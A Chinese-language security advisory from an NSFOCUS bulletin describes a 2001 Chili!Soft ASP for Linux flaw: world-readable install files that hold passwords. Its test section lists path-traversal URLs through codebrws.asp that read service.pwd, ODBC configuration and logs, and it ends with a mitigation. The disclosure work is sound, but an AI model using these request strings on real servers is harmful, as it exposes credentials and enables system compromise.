首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第19期->最新漏洞
期刊号: 类型: 关键词:
Chili!Soft ASP 系统文件可远程随意读取漏洞

日期:2001-02-19

受影响的系统:  
Chilisoft ChiliSoft ASP for Linux 3.5.2
ChiliSoft ChiliSoft ASP for Linux 3.5
ChiliSoft ChiliSoft ASP for Linux 3.0
描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 2407
  
Chili!Soft ASP 安装过程中创建许多敏感文件,把这些文件设置成 666 模式(谁都可以读)。
这些文件中包括存有用户和管理口令及其他敏感信息的文件。它们有这样一些:

/opt/casp/logs/install_summary
/opt/casp/logs/install
/opt/casp/logs/register
/opt/casp/logs/server-3000
/opt/casp/logs/component
/opt/casp/caspsamp/401K/database/QEDBF.INI
/opt/casp/caspsamp/friendship/agent/database/QEDBF.INI
/opt/casp/caspsamp/friendship/client/database/QEDBF.INI
/opt/casp/caspsamp/QEDBF.INI
/opt/casp/chilicom/lib/hkey.current.user
/opt/casp/chilicom/lib/hkey.local.machine
/opt/casp/INSTALL/.webserver-cache
/opt/casp/.installed_db
/opt/casp/admin/conf/hkey.current.user
/opt/casp/admin/conf/hkey.local.machine
/opt/casp/admin/logs/server

远程攻击者向服务器提交 URL 访问这些敏感文件,获取的信息还有可能危及 root 账号。

<* 来源:Stan Bubrouski (stan@ccs.neu.edu) *>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



在浏览器中输入如下形式的 URL:

  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000


--------------------------------------------------------------------------------
建议:

临时解决办法:

   NSFOCUS建议用某种方法拒绝对 codebrws.asp 的请求,或者除非非要用它,干脆删除这
   个脚本。

厂商补丁:

   暂无


版权所有,未经许可,不得转载